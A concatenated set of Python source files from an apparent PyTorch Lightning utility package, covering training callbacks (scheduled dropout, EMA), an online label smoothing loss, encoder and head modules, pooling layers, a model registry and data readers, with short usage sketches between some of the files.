"""Slowly changes dropout value for `attr_name` each epoch.
Ref: https://arxiv.org/abs/1703.06229
Attributes:
epochs: num epochs to max dropout to fully take effect
attr_name: name of dropout block in model
"""
def __init__(self, epochs: int = 10, attr_name: str = "dropout.p") -> None:
"""Create a new instance of `ScheduledDropoutCallback`"""
super().__init__()
self.epochs = epochs
self.attr_name = attr_name
self._dropout_rates: Dict[torch.nn.Module, float] = dict()
def on_before_accelerator_backend_setup(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Initialize dictionary contains initial probabilities."""
module = getattr(pl_module.model, self.attr_name)
if isinstance(module, torch.nn.Sequential):
for layer in module.children():
if isinstance(layer, torch.nn.Dropout):
self._dropout_rates[layer] = layer.p
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Changes dropout value."""
module = getattr(pl_module.model, self.attr_name)
if isinstance(module, torch.nn.Sequential):
for layer in module.children():
if isinstance(layer, torch.nn.Dropout):
current_rate = self._dropout_rates[layer] * min(1, pl_module.current_epoch / self.epochs)
layer.p = current_rate
__all__ = ["ScheduledDropoutCallback"]
```
#### File: fulmo/callbacks/ema.py
```python
from copy import deepcopy
from typing import Dict, Optional
import pytorch_lightning as pl
import torch
import torch.nn as nn
from pytorch_lightning.utilities.exceptions import MisconfigurationException
from .base import BaseCallback
class EmaCallback(BaseCallback):
"""Callback that perform EMA.
Model Exponential Moving Average. Empirically it has been found that using the moving average
of the trained parameters of a deep network is better than using its trained parameters directly.
"""
def __init__(
self,
ema_decay_per_epoch: float = 0.3,
apply_on_epoch: Optional[int] = None,
stop_after_epoch: Optional[int] = None,
every_n_step: Optional[int] = 10,
use_num_updates: bool = True,
device: Optional[str] = None,
) -> None:
"""Create a new instance of EmaCallback."""
super().__init__(apply_on_epoch, stop_after_epoch)
if device is not None and not isinstance(device, str):
raise MisconfigurationException(f"device is expected to be a torch.device or a str. Found {device}")
self._every_n_step = every_n_step
self._device = device
self._ema_decay_per_epoch = ema_decay_per_epoch
self._model_contains_batch_norm: Optional[bool] = None
self._num_updates: Optional[int] = 0 if use_num_updates else None
self._decay: Optional[float] = None
self._average_model: Optional[pl.LightningModule] = None
self._accumulate_grad_batches: Optional[int] = None
self.momenta: Dict[nn.Module, float] = {}
@staticmethod
def _pl_module_contains_batch_norm(pl_module: pl.LightningModule) -> bool:
"""Check if there are _BatchNorm layers."""
return any(isinstance(module, nn.modules.batchnorm._BatchNorm) for module in pl_module.modules())
@staticmethod
def _copy_to(src_pl_module: pl.LightningModule, dst_pl_module: pl.LightningModule) -> None:
"""Copy parameters from `src_pl_module` to `dst_pl_module`."""
for src_param, dst_param in zip(src_pl_module.parameters(), dst_pl_module.parameters()):
dst_param.detach().copy_(src_param.to(dst_param.device))
def _reset_batch_norm_and_save_state(self, pl_module: pl.LightningModule) -> None:
"""Adapted from https://github.com/pytorch/pytorch/blob/v1.7.1/torch/optim/swa_utils.py#L140-L154."""
self.momenta = {}
for module in pl_module.modules():
if not isinstance(module, nn.modules.batchnorm._BatchNorm):
continue
module.running_mean = torch.zeros_like(
module.running_mean, device=pl_module.device, dtype=module.running_mean.dtype
)
module.running_var = torch.ones_like(
module.running_var, device=pl_module.device, dtype=module.running_var.dtype
)
self.momenta[module] = module.momentum
module.momentum = None
module.num_batches_tracked *= 0
def _reset_momenta(self) -> None:
"""Adapted from https://github.com/pytorch/pytorch/blob/v1.7.1/torch/optim/swa_utils.py#L164-L165."""
for bn_module in self.momenta:
bn_module.momentum = self.momenta[bn_module]
def on_before_accelerator_backend_setup(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Prepare values and a lightning-module."""
# copy the model before moving it to accelerator device.
super().on_before_accelerator_backend_setup(trainer, pl_module)
self._decay = self._ema_decay_per_epoch ** (1 / len(trainer.datamodule.data_train)) # type: ignore[attr-defined]
with pl_module._prevent_trainer_and_dataloaders_deepcopy():
self._average_model = deepcopy(pl_module)
def on_fit_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when fit begins."""
optimizers = trainer.optimizers
lr_schedulers = trainer.lr_schedulers
if len(optimizers) != 1:
raise MisconfigurationException("EMA currently works with 1 `optimizer`.")
if len(lr_schedulers) > 1:
raise MisconfigurationException("EMA currently not supported for more than 1 `lr_scheduler`.")
self._model_contains_batch_norm = self._pl_module_contains_batch_norm(pl_module)
if self._model_contains_batch_norm:
# virtually increase max_epochs to perform batch norm update on latest epoch.
trainer.fit_loop.max_epochs += 1
def on_train_epoch_start(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when the train epoch begins."""
super().on_train_epoch_start(trainer, pl_module)
if trainer.current_epoch == self.apply_on_epoch:
# move average model to request device.
self._average_model = self._average_model.to(self._device or pl_module.device)
if self.apply_on_epoch <= trainer.current_epoch <= self.stop_after_epoch:
gs = trainer.global_step
if gs % self._every_n_step == 0:
self.update_parameters(self._average_model, pl_module)
# Note: No > here in case the callback is saved with the model and training continues
if trainer.current_epoch == self.stop_after_epoch + 1:
# Transfer weights from average model to pl_module
self._copy_to(self._average_model, pl_module)
# Reset BatchNorm for update
self._reset_batch_norm_and_save_state(pl_module)
# There is no need to perform either backward or optimizer.step as we are
# performing only one pass over the train data-loader to compute activation statistics
# Therefore, we will virtually increase `num_training_batches` by 1 and skip backward.
trainer.num_training_batches += 1
trainer.fit_loop._skip_backward = True
self._accumulate_grad_batches = trainer.accumulate_grad_batches
trainer.accumulate_grad_batches = trainer.num_training_batches
def on_train_epoch_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when the train epoch ends."""
super().on_train_epoch_end(trainer, pl_module)
trainer.fit_loop._skip_backward = False
def on_train_end(self, trainer: pl.Trainer, pl_module: pl.LightningModule) -> None:
"""Called when the train ends."""
if self._model_contains_batch_norm and trainer.current_epoch == self.stop_after_epoch + 1:
# BatchNorm epoch update. Reset state
trainer.accumulate_grad_batches = self._accumulate_grad_batches
trainer.num_training_batches -= 1
trainer.fit_loop.max_epochs -= 1
self._reset_momenta()
elif trainer.current_epoch == self.stop_after_epoch:
# Last EMA epoch. Transfer weights from average model to pl_module
self._copy_to(self._average_model, pl_module)
def update_parameters(self, average_model: pl.LightningModule, model: pl.LightningModule) -> None:
"""Update currently maintained parameters.
Call this every time the parameters are updated, such as the result of the `optimizer.step()` call.
Args:
average_model: Usually shadow parameters.
model: Usually the same set of parameters used to initialize this object.
"""
decay = self._decay
if self._num_updates is not None:
self._num_updates += 1
decay = min(decay, (1 + self._num_updates) / (10 + self._num_updates))
one_minus_decay = 1.0 - decay
with torch.no_grad():
for s_param, param in zip(average_model.parameters(), model.parameters()):
param_ = param.to(s_param.device)
s_param.sub_(one_minus_decay * (s_param - param_))
__all__ = ["EmaCallback"]
```
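A hedged wiring sketch for the callback above: `MyModel` and `MyDataModule` are placeholders and the epoch bounds are arbitrary; the callback itself expects `trainer.datamodule.data_train` to exist, as used in `on_before_accelerator_backend_setup`.
```python
# Hypothetical usage; MyModel and MyDataModule are placeholders, not part of this package.
import pytorch_lightning as pl

ema = EmaCallback(
    ema_decay_per_epoch=0.3,  # converted internally into a per-step decay
    apply_on_epoch=1,         # start maintaining the averaged copy at this epoch
    stop_after_epoch=20,      # averaged weights are copied back after this epoch
    every_n_step=10,          # update shadow parameters every 10 global steps
)
trainer = pl.Trainer(max_epochs=25, callbacks=[ema])
trainer.fit(MyModel(), datamodule=MyDataModule())
```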
#### File: fulmo/losses/online_smooth.py
```python
import torch
import torch.nn as nn
class OnlineLabelSmoothing(nn.Module):
"""Implements Online Label Smoothing from paper https://arxiv.org/pdf/2011.12562.pdf."""
def __init__(self, n_classes: int, alpha: float, smoothing: float = 0.1) -> None:
"""Create a new instance of `OnlineLabelSmoothing`.
Args:
n_classes: Number of classes of the classification problem
alpha: Term for balancing soft_loss and hard_loss
smoothing: Smoothing factor to be used during first epoch in soft_loss
Raises:
ValueError: if `alpha` or `smoothing` greater than 1 or less than 0
"""
super(OnlineLabelSmoothing, self).__init__()
        if not 0.0 <= alpha <= 1.0:
            raise ValueError("alpha must be in range [0, 1].")
        if not 0.0 <= smoothing <= 1.0:
            raise ValueError("smoothing must be in range [0, 1].")
self._alpha = alpha
self._n_classes = n_classes
# With alpha / (n_classes - 1) ----> Alternative
self.register_buffer("supervise", torch.zeros(n_classes, n_classes))
self.supervise.fill_(smoothing / (n_classes - 1))
self.supervise.fill_diagonal_(1 - smoothing)
# Update matrix is used to supervise next epoch
self.register_buffer("update", torch.zeros_like(self.supervise))
# For normalizing we need a count for each class
self.register_buffer("idx_count", torch.zeros(n_classes))
self.hard_loss = nn.CrossEntropyLoss()
def forward(self, outputs: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""Calculate the final loss."""
soft_loss = self.soft_loss(outputs, target)
hard_loss = self.hard_loss(outputs, target)
return self._alpha * hard_loss + (1 - self._alpha) * soft_loss
def soft_loss(self, outputs: torch.Tensor, target: torch.Tensor) -> torch.Tensor:
"""Calculates the soft loss and calls step to update `update`.
Args:
outputs: Predicted logits.
target: Ground truth labels.
Returns:
Calculates the soft loss based on current supervise matrix.
"""
outputs = outputs.log_softmax(dim=-1)
with torch.no_grad():
self.step(outputs.exp(), target)
true_dist = torch.index_select(self.supervise, 1, target).swapaxes(-1, -2)
return torch.mean(torch.sum(-true_dist * outputs, dim=-1))
def step(self, outputs: torch.Tensor, target: torch.Tensor) -> None:
"""Updates `update` with the probabilities of the correct predictions and updates `idx_count` counter.
Steps:
1. Calculate correct classified examples.
2. Filter `outputs` based on the correct classified.
3. Add `y_h_f` rows to the `j` (based on y_h_idx) column of `memory`.
4. Keep count of # samples added for each `y_h_idx` column.
5. Average memory by dividing column-wise by result of step (4).
Note on (5): This is done outside this function since we only need to
normalize at the end of the epoch.
Args:
outputs: Predicted logits.
target: Ground truth labels.
"""
# 1. Calculate predicted classes
y_h_idx = outputs.argmax(dim=-1)
# 2. Filter only correct
mask = torch.eq(y_h_idx, target)
y_h_c = outputs[mask]
y_h_idx_c = y_h_idx[mask]
# 3. Add y_h probabilities rows as columns to `memory`
self.update.index_add_(1, y_h_idx_c, y_h_c.swapaxes(-1, -2))
# 4. Update `idx_count`
self.idx_count.index_add_(0, y_h_idx_c, torch.ones_like(y_h_idx_c, dtype=torch.float32))
def next_epoch(self) -> None:
"""This function should be called at the end of the epoch."""
# 5. Divide memory by `idx_count` to obtain average (column-wise)
self.idx_count[torch.eq(self.idx_count, 0)] = 1 # Avoid 0 denominator
# Normalize by taking the average
self.update /= self.idx_count
self.idx_count.zero_()
self.supervise = self.update
self.update = self.update.clone().zero_()
__all__ = ["OnlineLabelSmoothing"]
```
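A minimal smoke test for the loss above. The tiny linear model and random batches are placeholders; the only contract taken from the class is that `forward` receives logits plus integer targets and that `next_epoch()` is called once per epoch.
```python
# Hypothetical smoke test; the linear model and random data are placeholders.
import torch
import torch.nn as nn

model = nn.Linear(16, 10)
optimizer = torch.optim.SGD(model.parameters(), lr=0.1)
criterion = OnlineLabelSmoothing(n_classes=10, alpha=0.5, smoothing=0.1)

for epoch in range(2):
    for _ in range(5):
        x = torch.randn(8, 16)
        y = torch.randint(0, 10, (8,))
        loss = criterion(model(x), y)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
    criterion.next_epoch()   # fold the accumulated predictions into the supervise matrix
```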
#### File: models/cv/base.py
```python
import abc
from typing import Dict, Optional, Sequence, Tuple, Union
import timm
import torch
import torch.nn as nn
from ...modules.activation import Mish, Swish
activation_dict = dict(lrelu=nn.LeakyReLU, relu=nn.ReLU, elu=nn.ELU, mish=Mish, swish=Swish, identity=nn.Identity)
class AbstractEncoder(metaclass=abc.ABCMeta):
"""Top layer in nn."""
@property
@abc.abstractmethod
def out_features(self) -> int:
"""Get size of tensor before pooling layer."""
raise NotImplementedError()
@abc.abstractmethod
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from the `x`."""
raise NotImplementedError()
class AbstractHead(metaclass=abc.ABCMeta):
"""Last layer in nn."""
@abc.abstractmethod
def _init_weights(self) -> None:
"""Initialize layers with some weights."""
raise NotImplementedError()
@abc.abstractmethod
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from the layers."""
raise NotImplementedError()
@abc.abstractmethod
def in_features(self) -> int:
"""Get size of input for last fc layer."""
raise NotImplementedError()
@abc.abstractmethod
def out_channels(self) -> int:
"""Get size of output for last fc layer."""
raise NotImplementedError()
class Head(AbstractHead, nn.Module):
"""Last layer in nn."""
def __init__(
self,
in_channels: int,
out_channels: int,
activation_name: str = "relu",
num_layers: int = 0,
dropout: float = 0,
activation_parameters: Optional[Dict[str, Union[float, int, str]]] = None,
layers_order: Tuple[str, ...] = ("linear", "bn", "activation", "dropout"),
) -> None:
"""Create a new instance of Head.
Args:
in_channels: size of each input sample.
out_channels: size of each output sample.
activation_name: name of activation.
num_layers: number of block except the last fc with following layers.
dropout: append "Dropout" or not.
activation_parameters: specific parameters for the selected activation type.
layers_order: Order of layers for the head. Default - ("Linear", "BatchNorm", "Activation, "Dropout")
Raises:
KeyError: if `activation_name` does not implemented
ValueError: if `layers_order` contains an unsupported layer.
"""
if activation_name not in activation_dict:
raise KeyError(f"Activation {activation_name} does not implemented")
super().__init__()
self._layers: Sequence[nn.ModuleList] = []
layer_names = layers_order * num_layers
include_bn = "bn" in layers_order
activation_parameters = activation_parameters if activation_parameters else {}
layers = list()
for name in layer_names:
if name == "linear":
out_features = in_channels // 2
layer = nn.Linear(in_features=in_channels, out_features=out_features, bias=not include_bn)
in_channels = out_features
elif name == "bn":
layer = nn.BatchNorm1d(in_channels)
elif name == "activation":
layer = activation_dict[activation_name](**activation_parameters)
elif name == "dropout":
layer = nn.Dropout(p=dropout)
else:
raise ValueError(f"Invalid name of layer - {name}")
layers.append(layer)
self.model = nn.Sequential(*layers)
self.fc = nn.Linear(in_channels, out_channels, bias=not include_bn)
self._init_weights()
@property
def in_features(self) -> int:
"""Get size of input for last fc layer."""
return int(self.fc.in_features)
@property
def out_channels(self) -> int:
"""Get size of output for last fc layer."""
return int(self.fc.out_features)
def _init_weights(self) -> None:
"""Initialize layers with some weights."""
for m in self.modules():
if isinstance(m, nn.Linear):
torch.nn.init.xavier_uniform_(m.weight)
elif isinstance(m, (nn.BatchNorm2d, nn.BatchNorm1d)):
m.weight.data.fill_(1.0)
m.bias.data.zero_()
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from the layers."""
return self.model(x)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
x = self.extract_features(x)
x = self.fc(x)
return x
class Encoder(AbstractEncoder, nn.Module):
"""Feature extractor based on `timm` library."""
def __init__(self, name: str, *args, **kwargs) -> None:
"""Create a new instance of Encoder.
Args:
name: A name of models to instantiate.
args: Parameters for timm models.
kwargs: Parameters for timm models.
"""
super(Encoder, self).__init__()
self.model = timm.create_model(name, *args, **kwargs)
self._in_features: int = self.model.num_features
@property
def out_features(self) -> int:
"""Get size of tensor before pooling layer."""
return self._in_features
def extract_features(self, x: torch.Tensor) -> torch.Tensor:
"""Extract features from layers excluding `pool` and `fc` layers."""
return self.model.forward_features(x)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
x = self.extract_features(x)
return x
__all__ = ["AbstractEncoder", "Encoder", "Head"]
```
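A hedged sketch of composing `Encoder` and `Head` into a classifier. The backbone name, shapes and the global average pooling step are illustrative choices; the package's own pooling modules live elsewhere.
```python
# Illustrative composition; 'resnet18' and the tensor shapes are arbitrary choices.
import torch
import torch.nn.functional as F

encoder = Encoder("resnet18", pretrained=False)
head = Head(in_channels=encoder.out_features, out_channels=10, num_layers=1, dropout=0.2)

x = torch.randn(2, 3, 224, 224)
features = encoder(x)                                     # (2, C, H, W) feature map
pooled = F.adaptive_avg_pool2d(features, 1).flatten(1)    # (2, C)
logits = head(pooled)                                     # (2, 10)
```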
#### File: fulmo/models/__init__.py
```python
import importlib
import os
from typing import Any, Callable
from .interface import BaseModel
MODEL_REGISTRY = dict()
MODEL_DATACLASS_REGISTRY = dict()
def register_model(name: str, dataclass: object = None) -> Callable:
"""New model types can be added to Fulmo with the :func:`register_model` function decorator.
For example::
@register_model('image_classification')
class ImageClassificationModel(BaseModel):
(...)
.. note:: All models must implement the :class:`cls.__name__` interface.
Args:
name: a name of the model
dataclass: a config of the model
Returns:
A decorator function to register models.
"""
def _register_model_cls(cls: Any) -> Any:
"""Add a model to a registry."""
if name in MODEL_REGISTRY:
raise ValueError(f"Cannot register duplicate model ({name})")
if not issubclass(cls, BaseModel):
            raise ValueError(f"Model ({name}: {cls.__name__}) must extend BaseModel")
MODEL_REGISTRY[name] = cls
cls.__dataclass = dataclass
if dataclass is not None:
if name in MODEL_DATACLASS_REGISTRY:
raise ValueError(f"Cannot register duplicate model ({name})")
MODEL_DATACLASS_REGISTRY[name] = dataclass
return cls
return _register_model_cls
# automatically import any Python files in the models/ directory
models_dir = os.path.dirname(__file__)
for file in os.listdir(models_dir):
if os.path.isdir(os.path.join(models_dir, file)) and not file.startswith("__"):
for subfile in os.listdir(os.path.join(models_dir, file)):
path = os.path.join(models_dir, file, subfile)
if subfile.endswith(".py"):
python_file = subfile[: subfile.find(".py")] if subfile.endswith(".py") else subfile
module = importlib.import_module(f"fulmo.models.{file}.{python_file}")
continue
path = os.path.join(models_dir, file)
if file.endswith(".py"):
model_name = file[: file.find(".py")] if file.endswith(".py") else file
module = importlib.import_module(f"fulmo.models.{model_name}")
```
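A short sketch of how the registry might be used, mirroring the example from the decorator's docstring; the import paths are assumptions based on the file layout above, and the subclass body is left empty for illustration.

```python
from fulmo.models import MODEL_REGISTRY, register_model  # assumed import paths
from fulmo.models.interface import BaseModel


@register_model("image_classification")
class ImageClassificationModel(BaseModel):
    """Illustrative model registered under the name 'image_classification'."""


# The decorated class can now be looked up by name.
assert MODEL_REGISTRY["image_classification"] is ImageClassificationModel
```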
#### File: modules/activation/swish.py
```python
import torch
import torch.nn as nn
from .functional import swish
class Swish(nn.Module):
"""Swish activation function. https://arxiv.org/abs/1710.05941"""
def __init__(self, beta: float = 1.0) -> None:
"""Create a new instance of Swish operator."""
super(Swish, self).__init__()
self.beta = beta
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
return swish(x, self.beta)
__all__ = ["Swish"]
```
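The `functional.swish` helper imported above is not included in this dump; a common definition, and presumably what the module expects, is sketched below.

```python
import torch


def swish(x: torch.Tensor, beta: float = 1.0) -> torch.Tensor:
    """Swish activation: x * sigmoid(beta * x)."""
    return x * torch.sigmoid(beta * x)


# With beta=1 this coincides with torch.nn.functional.silu.
x = torch.randn(4)
assert torch.allclose(swish(x), torch.nn.functional.silu(x), atol=1e-6)
```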
#### File: modules/pooling/functional.py
```python
import torch
import torch.nn.functional as F
def adaptive_avgmax_pool2d(x: torch.Tensor, output_size: int = 1) -> torch.Tensor:
    """Apply average and max pooling and sum the results."""
x_avg = F.adaptive_avg_pool2d(x, output_size)
x_max = F.adaptive_max_pool2d(x, output_size)
return x_avg + x_max
def adaptive_catavgmax_pool2d(x: torch.Tensor, output_size: int = 1) -> torch.Tensor:
    """Apply average and max pooling and concatenate the results into one tensor."""
x_avg = F.adaptive_avg_pool2d(x, output_size)
x_max = F.adaptive_max_pool2d(x, output_size)
return torch.cat((x_avg, x_max), 1)
__all__ = ["adaptive_avgmax_pool2d", "adaptive_catavgmax_pool2d"]
```
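A quick shape check for the two helpers, assuming the module is importable under the path below: summing keeps the channel count, concatenation doubles it.

```python
import torch
from fulmo.modules.pooling.functional import (  # assumed import path
    adaptive_avgmax_pool2d,
    adaptive_catavgmax_pool2d,
)

x = torch.randn(2, 64, 8, 8)
print(adaptive_avgmax_pool2d(x).shape)     # torch.Size([2, 64, 1, 1])
print(adaptive_catavgmax_pool2d(x).shape)  # torch.Size([2, 128, 1, 1])
```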
#### File: modules/pooling/pyramid.py
```python
import math
from typing import Tuple
import torch
import torch.nn as nn
import torch.nn.functional as F
class PyramidPooling(nn.Module):
"""Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition. https://arxiv.org/abs/1406.4729"""
def __init__(self, levels: Tuple[int, ...], mode: str = "max") -> None:
"""General Pyramid Pooling class which uses Spatial Pyramid Pooling by default.
And holds the static methods for both spatial and temporal pooling.
Args:
levels: defines the different divisions to be made in the width and (spatial) height dimension
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
"""
super(PyramidPooling, self).__init__()
self.levels = levels
self.mode = mode
@staticmethod
def spatial_pyramid_pool(previous_conv: torch.Tensor, levels: Tuple[int, ...], mode: str) -> torch.Tensor:
"""Apply Static Spatial Pyramid Pooling method, which divides the input Tensor vertically and horizontally.
(last 2 dimensions) according to each level in the given levels and pools its value according to the given mode.
Args:
previous_conv: input tensor of the previous convolutional layer
levels: defines the different divisions to be made in the width and height dimension
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
Returns:
a tensor vector with shape [batch x 1 x n],
where n: sum(filter_amount*level*level) for each level in levels
which is the concentration of multi-level pooling
Raises:
ValueError: if mode not in ("avg", "max")
"""
num_sample = previous_conv.size(0)
previous_conv_size = [int(previous_conv.size(2)), int(previous_conv.size(3))]
for i in range(len(levels)):
h_kernel = int(math.ceil(previous_conv_size[0] / levels[i]))
w_kernel = int(math.ceil(previous_conv_size[1] / levels[i]))
w_pad1 = int(math.floor((w_kernel * levels[i] - previous_conv_size[1]) / 2))
w_pad2 = int(math.ceil((w_kernel * levels[i] - previous_conv_size[1]) / 2))
h_pad1 = int(math.floor((h_kernel * levels[i] - previous_conv_size[0]) / 2))
h_pad2 = int(math.ceil((h_kernel * levels[i] - previous_conv_size[0]) / 2))
assert w_pad1 + w_pad2 == (w_kernel * levels[i] - previous_conv_size[1]) and h_pad1 + h_pad2 == (
h_kernel * levels[i] - previous_conv_size[0]
)
padded_input = F.pad(input=previous_conv, pad=[w_pad1, w_pad2, h_pad1, h_pad2], mode="constant", value=0)
if mode == "max":
pool = nn.MaxPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
elif mode == "avg":
pool = nn.AvgPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
else:
                raise ValueError('Unknown pooling type: %s, please use "max" or "avg".' % mode)
x = pool(padded_input)
if i == 0:
spp = x.view(num_sample, -1)
else:
spp = torch.cat((spp, x.view(num_sample, -1)), 1)
return spp
@staticmethod
    def temporal_pyramid_pool(previous_conv: torch.Tensor, out_pool_size: Tuple[int, ...], mode: str) -> torch.Tensor:
        """Apply the static Temporal Pyramid Pooling method, which divides the input Tensor horizontally (last dimension)
        according to each level in the given levels and pools its values according to the given mode.
        In other words: it divides the input Tensor into "level" horizontal stripes of roughly equal width,
        keeps the original height, and pools the values inside each stripe.
Args:
previous_conv: input tensor of the previous convolutional layer
out_pool_size: defines the different divisions to be made in the width dimension
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
Returns:
a tensor vector with shape [batch x 1 x n],
where n: sum(filter_amount*level) for each level in levels
which is the concentration of multi-level pooling
Raises:
ValueError: if mode not in ("avg", "max")
"""
num_sample = previous_conv.size(0)
previous_conv_size = [int(previous_conv.size(2)), int(previous_conv.size(3))]
for i in range(len(out_pool_size)):
h_kernel = previous_conv_size[0]
w_kernel = int(math.ceil(previous_conv_size[1] / out_pool_size[i]))
w_pad1 = int(math.floor((w_kernel * out_pool_size[i] - previous_conv_size[1]) / 2))
w_pad2 = int(math.ceil((w_kernel * out_pool_size[i] - previous_conv_size[1]) / 2))
assert w_pad1 + w_pad2 == (w_kernel * out_pool_size[i] - previous_conv_size[1])
padded_input = F.pad(input=previous_conv, pad=[w_pad1, w_pad2], mode="constant", value=0)
if mode == "max":
pool = nn.MaxPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
elif mode == "avg":
pool = nn.AvgPool2d((h_kernel, w_kernel), stride=(h_kernel, w_kernel), padding=(0, 0))
else:
                raise ValueError('Unknown pooling type: %s, please use "max" or "avg".' % mode)
x = pool(padded_input)
if i == 0:
tpp = x.view(num_sample, -1)
else:
tpp = torch.cat((tpp, x.view(num_sample, -1)), 1)
return tpp
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
return self.spatial_pyramid_pool(x, self.levels, self.mode)
def get_output_size(self, filters: int) -> int:
"""Calculate the output shape given a filter_amount: sum(filter_amount*level*level) for each level in levels.
Can be used to x.view(-1, spp.get_output_size(filter_amount)) for the fully-connected layers
Args:
filters: the amount of filter of output fed into the spatial pyramid pooling
Returns:
sum(filter_amount*level*level)
"""
out = 0
for level in self.levels:
out += filters * level * level
return out
class SpatialPyramidPooling(PyramidPooling):
"""Spatial Pyramid Pooling in Deep Convolutional Networks for Visual Recognition https://arxiv.org/abs/1406.4729"""
    def __init__(self, levels: Tuple[int, ...], mode: str = "max") -> None:
        """Spatial Pyramid Pooling Module, which divides the input Tensor vertically and horizontally
        (last 2 dimensions) according to each level in the given levels and pools its value according to the given mode.
        Can be used as every other pytorch Module and has no learnable parameters since it's a static pooling.
        It divides the input Tensor into level*level rectangles of roughly equal width and height and pools the values inside each rectangle (the input is padded to fit).
Args:
            levels: defines the different divisions to be made in the width and height dimensions
mode: defines the underlying pooling mode to be used, can either be "max" or "avg"
"""
super(SpatialPyramidPooling, self).__init__(levels, mode=mode)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Run forward pass."""
return self.spatial_pyramid_pool(x, self.levels, self.mode)
def get_output_size(self, filters: int) -> int:
"""Calculate the output shape given a filter_amount: sum(filter_amount*level*level) for each level in levels.
Can be used to x.view(-1, spp.get_output_size(filter_amount)) for the fully-connected layers
Args:
filters: the amount of filter of output fed into the spatial pyramid pooling
Returns:
sum(filter_amount*level*level)
"""
out = 0
for level in self.levels:
out += filters * level * level
return out
__all__ = ["SpatialPyramidPooling"]
```
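A usage sketch for `SpatialPyramidPooling` (import path assumed): regardless of the input's spatial size, the output length per sample is `channels * sum(level * level)`.

```python
import torch
from fulmo.modules.pooling.pyramid import SpatialPyramidPooling  # assumed import path

spp = SpatialPyramidPooling(levels=(1, 2, 4), mode="max")
x = torch.randn(2, 32, 13, 17)   # arbitrary spatial size
out = spp(x)
print(out.shape)                 # torch.Size([2, 672])
print(spp.get_output_size(32))   # 672 == 32 * (1 + 4 + 16)
```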
#### File: fulmo/readers/label.py
```python
from typing import Dict, Optional, Union
import numpy as np
from ..utils.type_hints import IntegerScalar, NPType
from .base import IReader
from .functional import get_one_hot
class ScalarReader(IReader):
"""Numeric loader readers abstraction. Reads a single float, int, str or other from loader."""
def __init__(
self,
input_key: str,
output_key: str,
dtype: NPType = np.float32,
default_value: float = -1.0,
one_hot_classes: Optional[int] = None,
smoothing: Optional[float] = None,
) -> None:
"""Create a new instance of ScalarReader.
Args:
input_key: input key to use from annotation dict
output_key: output key to use to store the result
dtype: datatype of scalar values to use
default_value: default value to use if something goes wrong
one_hot_classes: number of one-hot classes
smoothing: if specified applies label smoothing to one_hot classes
"""
super().__init__(input_key, output_key)
self.dtype = dtype
self.default_value = default_value
self.one_hot_classes = one_hot_classes
self.smoothing = smoothing
if one_hot_classes is not None and smoothing is not None:
assert 0.0 < smoothing < 1.0, f"If smoothing is specified it must be in (0; 1), " f"got {smoothing}"
def __call__(self, element: Dict[str, Union[int, float, IntegerScalar]]) -> Dict[str, IntegerScalar]:
"""Read a row from your annotations dict and transfer it to a single value.
Args:
element: elem in your datasets
Returns:
dtype: Scalar value
"""
scalar = self.dtype(element.get(self.input_key, self.default_value))
if self.one_hot_classes is not None:
scalar = get_one_hot(scalar, self.one_hot_classes, smoothing=self.smoothing)
output = {self.output_key: scalar}
return output
__all__ = ["ScalarReader"]
```
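A small usage sketch for `ScalarReader` (import path assumed); the exact output of `get_one_hot` is defined in `.functional`, which is not shown here, so the commented result is an expectation rather than a guarantee.

```python
import numpy as np
from fulmo.readers.label import ScalarReader  # assumed import path

reader = ScalarReader(
    input_key="label",
    output_key="target",
    dtype=np.int64,
    one_hot_classes=10,
    smoothing=0.1,
)
sample = reader({"label": 3})
print(sample["target"])  # expected: a smoothed one-hot vector of length 10
```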
#### File: fulmo/fulmo/settings.py
```python
from enum import Enum
from typing import Optional, Union
from .utils.frozen_class import FrozenClass
from .utils.logging import get_logger
class Stage(str, Enum):
"""Stage names related to `pytorch-lightning` naming convention."""
train = "train"
val = "val"
test = "test"
predict = "predict"
def __eq__(self, other: Union[str, Enum]) -> bool: # type: ignore[override]
other = other.value if isinstance(other, Enum) else str(other)
return self.value.lower() == other.lower()
def __hash__(self) -> int:
# re-enable hashtable so it can be used as a dict key or in a set
# example: set(LightningEnum)
return hash(self.name)
@classmethod
def from_str(cls, value: str) -> Optional["Stage"]:
"""Create a new instance of `Stage` from string."""
statuses = [status for status in dir(cls) if not status.startswith("_")]
for st in statuses:
if st.lower() == value.lower():
return getattr(cls, st) # type: ignore[no-any-return]
return None
class Settings(FrozenClass):
"""Settings for the entire project."""
def __init__(
self,
mix_target_key: str = "mixed_target",
mix_lam_a_key: str = "lam_a",
mix_lam_b_key: str = "lam_b",
) -> None:
self.mix_target_key = mix_target_key
self.mix_lam_a_key = mix_lam_a_key
self.mix_lam_b_key = mix_lam_b_key
DEFAULT_SETTINGS = Settings()
logger = get_logger("global")
__all__ = ["DEFAULT_SETTINGS", "Settings", "Stage", "logger"]
```
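A short sketch of how `Stage` and the default settings behave, assuming the module is importable as `fulmo.settings`.

```python
from fulmo.settings import DEFAULT_SETTINGS, Stage  # assumed import path

assert Stage.train == "TRAIN"               # comparison is case-insensitive
assert Stage.from_str("Val") is Stage.val   # parsing back from a string
assert Stage.from_str("unknown") is None
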